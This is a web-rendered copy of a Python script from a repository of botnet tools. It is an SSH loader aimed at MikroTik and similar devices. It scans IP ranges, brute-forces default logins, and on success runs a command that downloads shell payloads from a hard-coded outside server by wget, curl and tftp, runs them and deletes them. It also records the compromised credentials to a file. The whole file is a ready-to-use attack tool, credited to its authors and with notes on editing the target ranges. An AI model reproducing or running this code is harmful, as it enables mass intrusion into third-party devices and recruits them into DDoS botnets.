Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/MIKROTIK SSH LOADER/Mikload.py
5038 views
1
#ulimit -n 999999
2
#Made simply for Kowai
3
#Made by slumptheogod @telnut on instagram
4
#line 86 is where u can edit ranges in the script Loli
5
6
import threading, paramiko, random, socket, time, sys
7
8
paramiko.util.log_to_file("/dev/null")
9
10
blacklisted = ["127.0","10.0","192.168"] #You can these out add or whatever u want lol
11
12
#server_ip = useless atm
13
14
passwords = ["support:support"]
15
16
if sys.argv[4] == "root":
17
passwords = ["root:root"]
18
if sys.argv[4] == "guest":
19
passwords = ["guest:guest"]
20
if sys.argv[4] == "telnet":
21
passwords = ["telnet:telnet"]
22
23
if len(sys.argv) < 4:
24
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
25
26
print """\n\x1b[0;37m******************************
27
* \x1b[0;31mSCANNER STARTING\x1b[0;37m *
28
******************************\x1b[0m"""
29
30
def sshscanner(ip):
31
global passwords
32
try:
33
thisipisbad='no'
34
for badip in blacklisted:
35
if badip in ip:
36
thisipisbad='yes'
37
if thisipisbad=='yes':
38
sys.exit()
39
username='root'
40
password="0"
41
port = 22
42
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43
s.settimeout(3)
44
s.connect((ip, port))
45
data = str(s.recv(1024))
46
if "SSH" in data:
47
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
48
elif "ssh" in data:
49
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
50
else:
51
sys.exit()
52
s.close()
53
ssh = paramiko.SSHClient()
54
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
55
dobreak=False
56
for passwd in passwords:
57
if ":n/a" in passwd:
58
password=""
59
else:
60
password=passwd.split(":")[1]
61
if "n/a:" in passwd:
62
username=""
63
else:
64
username=passwd.split(":")[0]
65
try:
66
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
67
break
68
except:
69
pass
70
badserver=True
71
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
72
output = stdout.read()
73
if "inet addr" in output:
74
badserver=False
75
websites = [ ]
76
if badserver == False:
77
print("\x1b[1;37mAttempting Mikrotik \x1b[1;33m-- \x1b[1;35m" + ip + ":" + username + ":" + password + "\x1b[37m")
78
ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://104.248.251.125/8UsA.sh; curl -O http://104.248.251.125/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 104.248.251.125 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 104.248.251.125; chmod 777 t8UsA2.sh; sh t8UsA2.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh")
79
vulns = open("Mikrotik.txt", "a").write(username + ":" + password + ":" + ip + "\n") #This is not needed u can take it out if u want
80
time.sleep(12)
81
ssh.close()
82
except Exception as e:
83
pass
84
85
86
if sys.argv[2] == "KOWAI":
87
ranges = ["188.16.000.000/188.19.255.255/181.112.0.0/201.245.180.0/"]
88
randomrange = random.choice(ranges)
89
startrng = randomrange.split("/")[0]
90
endrng = randomrange.split("/")[1]
91
92
if sys.argv[2] != "KOWAI":
93
a = int(sys.argv[2].split(".")[0])
94
b = int(sys.argv[2].split(".")[1])
95
c = int(sys.argv[2].split(".")[2])
96
d = int(sys.argv[2].split(".")[3])
97
else:
98
a = int(startrng.split(".")[0])
99
b = int(startrng.split(".")[1])
100
c = int(startrng.split(".")[2])
101
d = int(startrng.split(".")[3])
102
x = 0
103
104
while(True):
105
try:
106
107
if sys.argv[2] != "KOWAI":
108
endaddr = sys.argv[3]
109
else:
110
endaddr = endrng
111
112
d += 1
113
114
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
115
116
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
117
if sys.argv[2] == "KOWAI":
118
randomrange = random.choice(ranges)
119
startrng = randomrange.split("/")[0]
120
endrng = randomrange.split("/")[1]
121
a = int(startrng.split(".")[0])
122
b = int(startrng.split(".")[1])
123
c = int(startrng.split(".")[2])
124
d = int(startrng.split(".")[3])
125
else:
126
break
127
128
if d > 255:
129
c += 1
130
d = 0
131
132
if c > 255:
133
b += 1
134
c = 0
135
136
if b > 255:
137
a += 1
138
b = 0
139
140
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
141
142
if ipaddr == endaddr:
143
if sys.argv[2] == "KOWAI":
144
randomrange = random.choice(ranges)
145
startrng = randomrange.split("/")[0]
146
endrng = randomrange.split("/")[1]
147
a = int(startrng.split(".")[0])
148
b = int(startrng.split(".")[1])
149
c = int(startrng.split(".")[2])
150
d = int(startrng.split(".")[3])
151
else:
152
break
153
154
if x > 500:
155
time.sleep(1)
156
x = 0
157
158
t = threading.Thread(target=sshscanner, args=(ipaddr,))
159
t.start()
160
161
except Exception as e:
162
pass
163
164
print "\x1b[37mDone\x1b[37m"
165